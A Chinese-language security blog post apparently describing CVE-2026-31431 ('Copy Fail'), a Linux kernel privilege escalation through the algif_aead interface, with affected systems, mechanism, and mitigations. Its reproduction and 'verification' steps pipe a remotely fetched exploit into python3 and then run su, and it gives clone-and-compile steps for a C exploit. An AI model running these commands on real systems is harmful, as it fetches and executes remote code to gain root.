限时免费 | |
≥3年粉丝 | |
星球成员 |
2026 年 4 月 29 日,安全研究团队公开披露 Linux 内核存在潜伏近十年的高危本地提权漏洞,编号CVE-2026-31431,代号Copy Fail。
该漏洞无需复杂条件、无竞态、兼容性极强,普通用户仅凭一段 732 字节 Python 脚本,就能直接提升至 root 权限,还可实现容器逃逸、突破云租户隔离,对多用户主机、容器集群、CI/CD 环境威胁极大,堪称近年最危险的 Linux 内核漏洞之一。
视频来源:copy.fail
一、漏洞简介
二、影响范围
漏洞源自 2017 年内核优化提交,2017 年至今未修复的 Linux 内核均受影响,覆盖绝大多数主流发行版与云环境。
已实测受影响发行版
Debian、Arch Linux、Fedora、Rocky Linux、AlmaLinux、Oracle Linux 及大量嵌入式/定制Linux系统(国产麒麟、统信等基于Linux的系统)。
6.18.22+、6.19.12+、7.0+(上游主线已修复)。
高风险场景
三、漏洞原理
漏洞藏在 Linux 内核algif_aead密码算法接口,由 2017 年一次错误的原地操作优化引入。
关键组件
AF_ALG:内核提供的用户态密码运算 socket 接口,普通用户可直接调用
AEAD:带认证的加解密模式
authencesn 模板:特定 AEAD 实现,解密时向缓冲区写入数据
splice():零拷贝系统调用,可关联文件页面缓存与套接字缓冲区。
优化错误将 TX 与 RX 缓冲区当作同一缓冲区处理,解密时把文件页面缓存链接到可写散射表,在验证标签前提前写入 4 个可控字节,获得直写页面缓存的 4 字节写入能力。
为何极度危险
写入绕过 VFS 路径,不标记脏页,文件完整性工具难以发现
页面缓存全局共享,篡改后所有进程读取均为恶意版本
容器与宿主机共享缓存,可从容器内攻击宿主机,实现逃逸。
创建 AF_ALG 套接字→通过 splice 关联 su 等 setuid 文件页面缓存→写入 4 字节恶意数据→执行 su 直接获取 root shell。
四、漏洞复现
curl https://copy.fail/exp | python3 && su
也可以用 @0xShe 师傅用C重写的一个exp,用于应对目标没有Python的场景
git clone https://github.com/0xShe/CVE-2026-31431.gitcd CVE-2026-31431gcc -static exploit.c -o exploitchmod +x exploit./exploit

五、修复方案
升级内核至包含修复提交a664bf3d603d的版本,回滚 2017 年问题优化,隔离读写缓冲区,阻止页面缓存被篡改。
禁用algif_aead内核模块,阻断利用入口,操作如下:
# 临时卸载模块sudo rmmod algif_aead# 永久黑名单禁用echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf
注意:可能影响依赖 AF_ALG 的 VPN、TLS 库等程序,大部分系统无明显影响。
3. 验证是否受影响
lsmod | grep algif_aeadcurl https://copy.fail/exp | python3 && su4. 额外加固建议
六、安全提醒
Copy Fail 漏洞潜伏近十年、利用简单、影响极广,共享内核环境务必立即修复。未及时升级的服务器,建议先禁用 algif_aead 模块降低风险,尽快完成内核更新。
下载地址
回复关键字【260501】获取下载链接
知 识 星 球

限时免费 | |
≥3年粉丝 | |
星球成员 |
推 荐 阅 读



